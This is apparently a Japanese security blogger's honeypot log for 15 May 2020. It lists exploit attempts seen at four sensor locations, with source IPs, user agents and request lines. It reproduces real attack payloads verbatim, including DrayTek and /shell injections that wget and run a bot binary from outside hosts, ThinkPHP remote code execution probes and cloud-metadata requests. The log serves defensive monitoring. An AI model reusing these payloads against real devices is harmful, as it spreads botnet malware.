2020/05/15 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/05/15分です。

特徴

Location：JP

DrayTek製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Location：US

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

Location：UK

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
polaris botnetへのスキャン行為
zgrabへのスキャン行為
Apache Solrへのスキャン行為
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  172.245.52.231/jaws;
sh /tmp/

cd /tmp;
rm -rf *;
wget  cnc.9iar.me/jaws;
sh /tmp/jaws

Location：SG

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
polaris botnetへのスキャン行為
XTCへのスキャン行為
zgrabへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがAbcdであるアクセス
を確認しました。

他

アクセス数推移

JP：総アクセス数：57 (前日比：-6)
US：総アクセス数：132 (前日比：+104)
UK：総アクセス数：53 (前日比：+16)
SG：総アクセス数：51 (前日比：+25)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	42.188.19.107	Malaysia
17	44.224.22.196	United States
17	44.225.84.206	United States
1	49.49.242.97	Thailand
1	96.84.182.170	United States
10	106.13.222.241	China
1	133.232.87.13	Japan
1	162.243.136.141	United States
1	162.243.139.160	United States
1	179.49.60.210	Ecuador
4	195.54.160.121	Russia
2	222.186.150.105	China

UserAgent一覧

件数	UserAgent
22	-
14	AWS Security Scanner
1	Go-http-client/1.1
1	Mozilla/5.0
4	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
2	Mozilla/5.0 zgrab/0.x
1	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
10		\x16\x03\x01
10	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
4	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//example[.]com/	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	5.101.0.209	Russia
1	24.41.166.50	United States
1	61.219.11.153	Taiwan
1	72.138.37.2	Canada
3	80.82.78.104	Netherlands
1	91.203.61.191	Ukraine
1	98.187.171.82	United States
1	118.254.228.51	China
10	121.201.34.11	China
1	161.35.4.60	United States
1	162.243.140.138	United States
1	170.246.149.166	Costa Rica
1	190.0.57.46	Colombia
1	190.93.138.68	Colombia
5	195.54.160.121	Russia
100	221.120.37.189	Taiwan
1	223.155.92.236	China

UserAgent一覧

件数	UserAgent
4	-
1	Go-http-client/1.1
100	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 zgrab/0.x
2	Python-httplib2/0.17.3 (gzip)
4	XTC
1	XTC BOTNET
2	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1	GET	../../proc/ HTTP
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1/	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
100	GET	/phpmyadmin/	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/boaform/admin/formPing	HTTP/1.1
5	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
2	POST	/dvr/cmd	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	61.219.11.153	Taiwan
1	66.240.205.34	United States
1	79.124.62.46	Bulgaria
1	79.129.168.203	Greece
1	80.82.78.104	Netherlands
1	95.213.177.123	Russia
2	95.213.177.124	Russia
2	95.213.177.125	Russia
1	95.213.177.126	Russia
1	104.225.251.29	United States
10	106.52.92.57	China
10	119.96.133.212	China
1	125.64.94.211	China
1	154.126.79.223	Madagascar
1	162.243.139.50	United States
1	167.71.116.115	United States
1	172.104.242.173	United States
1	174.46.81.211	United States
1	185.128.41.50	Switzerland
1	190.167.10.147	Dominican Republic
1	193.42.99.162	United States
12	195.54.160.121	Russia

UserAgent一覧

件数	UserAgent
11	-
2	Go-http-client/1.1
1	Java/1.8.0_131
6	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
1	Mozilla/5.0
12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 zgrab/0.x
1	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
3		-
1		Gh0st\xad
1		\x03
1		\x16\x03\x01
1	GET	../../proc/ HTTP
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ 172.245.52.231/jaws;sh+/tmp/jaws
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ cnc.9iar.me/jaws;sh+/tmp/jaws
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//check[.]proxyradar[.]com/azenv.php?auth=158939709365&a=PSCMN&i=2224112162&p=80	HTTP/1.1
1	POST	http[:]//check[.]proxyradar[.]com/azenv.php?auth=158941343703&a=PSCMN&i=2224112162&p=80	HTTP/1.1
1	POST	http[:]//check[.]proxyradar[.]com/azenv.php?auth=158942961223&a=PSCMN&i=2224112162&p=80	HTTP/1.1
1	POST	http[:]//check[.]proxyradar[.]com/azenv.php?auth=158944598557&a=PSCMN&i=2224112162&p=80	HTTP/1.1
1	POST	http[:]//check[.]proxyradar[.]com/azenv.php?auth=158946232915&a=PSCMN&i=2224112162&p=80	HTTP/1.1
1	POST	http[:]//check[.]proxyradar[.]com/azenv.php?auth=158947827047&a=PSCMN&i=2224112162&p=80	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	5.101.0.209	Russia
10	36.103.229.37	China
3	59.126.61.145	Taiwan
1	66.76.250.45	United States
1	74.105.81.187	United States
1	77.61.185.101	Netherlands
4	80.82.77.33	Netherlands
6	80.82.78.104	Netherlands
9	100.38.51.212	United States
1	162.243.137.90	United States
1	162.243.144.220	United States
1	172.104.242.173	United States
1	174.118.46.5	Canada
1	180.175.193.18	China
1	184.162.45.52	Canada
1	185.128.41.50	Switzerland
1	188.3.58.161	Turkey
1	190.7.145.82	Colombia
1	190.94.192.8	Venezuela
1	190.249.168.25	Colombia
1	195.54.160.121	Russia
1	206.225.74.190	United States

UserAgent一覧

件数	UserAgent
12	-
4	Abcd
1	Go-http-client/1.1
1	Java/1.8.0_131
1	Mozilla/5.0
4	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 zgrab/0.x
6	Python-httplib2/0.17.3 (gzip)
9	XTC
1	polaris botnet
1	python-requests/2.23.0

リクエスト内容一覧

件数	Method	Request	Protocol
4		-
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
3	GET	/operator/basic.shtml?id=1337	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
2	GET	/sess-bin/login_session.cgi	HTTP/1.1
3	GET	/setup.cgi	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
9	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/doLogin	HTTP/1.1
6	POST	/dvr/cmd	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1